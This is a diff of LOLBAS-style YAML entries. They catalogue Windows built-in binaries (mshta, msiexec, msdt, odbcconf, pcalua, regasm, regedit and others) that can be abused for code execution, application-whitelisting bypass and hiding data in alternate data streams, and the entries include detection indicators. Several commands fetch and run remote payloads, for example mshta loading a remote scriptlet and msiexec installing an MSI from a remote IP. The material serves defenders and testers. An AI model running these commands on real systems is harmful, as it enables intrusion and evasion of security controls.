Author: ''
|
||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Msconfig.exe -5
|
||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||
Usecase: Code execution using Msconfig.exe
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\msconfig.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\msconfig.exe
|
||||
Code Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||
Detection:
|
||||
- IOC: mscfgtlc.xml changes in system32 folder
|
||||
- IOC: msconfig.exe executing
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/991314564896690177
|
||||
Notes: |
|
||||
Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
See the Payloads folder for an example mscfgtlc.xml file.
|
||||
|
||||
- Link: https://twitter.com/pabraeken/status/991314564896690177
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
@ -1,25 +1,37 @@
|
||||
---
|
||||
Name: Msdt.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Microsoft diagnostics tool
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Open .diagcab package
|
||||
Description: ''
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml
|
||||
/skip TRUE
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
Usecase: Execute code
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
Usecase: Execute code bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'C:\Windows\System32\Msdt.exe '
|
||||
- 'C:\Windows\SysWOW64\Msdt.exe '
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\Msdt.exe
|
||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||
Code Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- https://twitter.com/harr0ey/status/991338229952598016
|
||||
Notes: |
|
||||
Thanks to:
|
||||
See the Payloads folder for an example PCW8E57.xml file.
|
||||
|
||||
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- Link: https://twitter.com/harr0ey/status/991338229952598016
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
@ -1,28 +1,57 @@
|
||||
---
|
||||
Name: mshta.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Name: Mshta.exe
|
||||
Description: Used by Windows to execute html applications. (.hta)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: mshta.exe evilfile.hta
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
Usecase: Execute code
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1170
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
|
||||
Description: Executes VBScript supplied as a command line argument.
|
||||
- Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
|
||||
Usecase: Execute code
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1170
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
|
||||
Description: Executes JavaScript supplied as a command line argument.
|
||||
Usecase: Execute code
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1170
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: mshta.exe "C:\ads\file.txt:file.hta"
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
Usecase: Execute code hidden in alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1170
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\mshta.exe
|
||||
- C:\Windows\SysWOW64\mshta.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\mshta.exe
|
||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||
Code Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||
Detection:
|
||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||
- IOC: Usage of HTA file
|
||||
Resources:
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
|
||||
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,25 +1,54 @@
|
||||
---
|
||||
Name: Msiexec.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Used by Windows to execute msi files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: msiexec /quiet /i cmd.msi
|
||||
Description: Installs the target .MSI file silently.
|
||||
Usecase: Execute custom made msi file with attack code
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||
Description: Installs the target remote & renamed .MSI file silently.
|
||||
Usecase: Execute custom made msi file with attack code from remote server
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: msiexec /y "C:\folder\evil.dll"
|
||||
Description: Calls DLLRegisterServer to register the target DLL.
|
||||
Usecase: Execute dll files
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: msiexec /z "C:\folder\evil.dll"
|
||||
Description: Calls DLLRegisterServer to un-register the target DLL.
|
||||
Usecase: Execute dll files
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\msiexec.exe
|
||||
- c:\windows\sysWOW64\msiexec.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: msiexec.exe getting files from Internet
|
||||
Resources:
|
||||
- https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||
- https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman
|
||||
|
||||
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
Acknowledgement:
|
||||
- Person: netbiosX
|
||||
Handle: '@netbiosX'
|
||||
- Person: Philip Tsukerman
|
||||
Handle: @PhilipTsukerman
|
||||
---
|
@ -1,22 +1,28 @@
|
||||
---
|
||||
Name: odbcconf.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Name: Odbcconf.exe
|
||||
Description: Used in Windows for managing ODBC connections
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: odbcconf -f file.rsp
|
||||
Description: Load DLL specified in target .RSP file.
|
||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||
Usecase: Execute dll file using technique that can evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'c:\windows\system32\odbcconf.exe '
|
||||
- c:\windows\sysWOW64\odbcconf.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\odbcconf.exe
|
||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||
Code Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||
- https://github.com/woanware/application-restriction-bypasses
|
||||
- https://twitter.com/subTee/status/789459826367606784
|
||||
Notes: |
|
||||
Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer
|
||||
See the Playloads folder for an example .RSP file.
|
||||
|
||||
- Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||
- Link: https://github.com/woanware/application-restriction-bypasses
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,24 +1,44 @@
|
||||
---
|
||||
Name: Pcalua.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Program Compatibility Assistant
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: pcalua.exe -a calc.exe
|
||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||
Usecase: Proxy execution of binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: pcalua.exe -a \\server\payload.dll
|
||||
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
||||
Usecase: Proxy execution of remote dll file
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
||||
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
||||
Usecase: Execution of CPL files
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\pcalua.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://twitter.com/KyleHanslovan/status/912659279806640128
|
||||
Notes: |
|
||||
Thanks to:
|
||||
fab - @0rbz_
|
||||
Kyle Hanslovan - @KyleHanslovan
|
||||
|
||||
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
- Person: Fab
|
||||
Handle: @0rbz_
|
||||
---
|
@ -1,17 +1,26 @@
|
||||
---
|
||||
Name: Pcwrun.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Program Compatibility Wizard
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||
Usecase: Proxy execution of binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\pcwrun.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\pcwrun.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/991335019833708544
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
||||
- Link: https://twitter.com/pabraeken/status/991335019833708544
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
@ -1,19 +1,28 @@
|
||||
---
|
||||
Name: PresentationHost.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Name: Presentationhost.exe
|
||||
Description: File is used for executing Browser applications
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||
Description: Executes the target XAML Browser Application (XBAP) file.
|
||||
Description: Executes the target XAML Browser Application (XBAP) file
|
||||
Usecase: Execute code within xbap files
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'c:\windows\system32\PresentationHost.exe '
|
||||
- 'c:\windows\sysWOW64\PresentationHost.exe '
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\Presentationhost.exe
|
||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
|
||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,23 +1,45 @@
|
||||
---
|
||||
Name: Print.exe
|
||||
Description: Download, Copy, Add ADS
|
||||
Author: ''
|
||||
Description: Used by Windows to send files to the printer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
|
||||
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
|
||||
Usecase: Copy files
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
|
||||
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
|
||||
Usecase: Copy/Download file from remote server
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\print.exe
|
||||
- C:\Windows\SysWOW64\print.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\print.exe
|
||||
- Path: C:\Windows\SysWOW64\print.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Print.exe getting files from internet
|
||||
- IOC: Print.exe creating executable files on disk
|
||||
Resources:
|
||||
- https://twitter.com/Oddvarmoe/status/985518877076541440
|
||||
- https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
|
||||
- Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,18 +1,27 @@
|
||||
---
|
||||
Name: reg.exe
|
||||
Description: Export Reg, Add ADS, Import Reg
|
||||
Author: ''
|
||||
Name: Reg.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||
Description: Export the target Registry key and save it to the specified .REG file.
|
||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||
Usecase: Hide/plant registry information in Alternate data stream for later use
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\reg.exe
|
||||
- c:\windows\sysWOW64\reg.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\reg.exe
|
||||
- Path: C:\Windows\SysWOW64\reg.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: reg.exe writing to an ADS
|
||||
Resources:
|
||||
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,25 +1,39 @@
|
||||
---
|
||||
Name: Regasm.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Part of .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regasm.exe executing dll file
|
||||
Resources:
|
||||
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
|
||||
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
|
||||
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,20 +1,36 @@
|
||||
---
|
||||
Name: regedit.exe
|
||||
Description: Write ADS, Read ADS, Import registry
|
||||
Author: ''
|
||||
Name: Regedit.exe
|
||||
Description: Used by Windows to manipulate registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||
Description: Export the target Registry key to the specified .REG file.
|
||||
Usecase: Hide registry data in alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regedit C:\ads\file.txt:regfile.reg"
|
||||
Description: Import the target .REG file into the Registry.
|
||||
Usecase: Import hidden registry data from alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\regedit.exe
|
||||
- C:\Windows\SysWOW64\regedit.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\regedit.exe
|
||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regedit.exe reading and writing to alternate data stream
|
||||
- IOC: regedit.exe should normally not be executed by end-users
|
||||
Resources:
|
||||
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,18 +1,27 @@
|
||||
---
|
||||
Name: Register-cimprovider.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Used to register new wmi providers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||
Description: Load the target .DLL.
|
||||
Usecase: Execute code within dll file
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\Register-cimprovider.exe
|
||||
- c:\windows\sysWOW64\Register-cimprovider.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
Notes: Thanks to PhilipTsukerman - @PhilipTsukerman
|
||||
|
||||
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
Acknowledgement:
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
@ -1,23 +1,37 @@
|
||||
---
|
||||
Name: Regsvcs.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
Category: Execute
|
||||
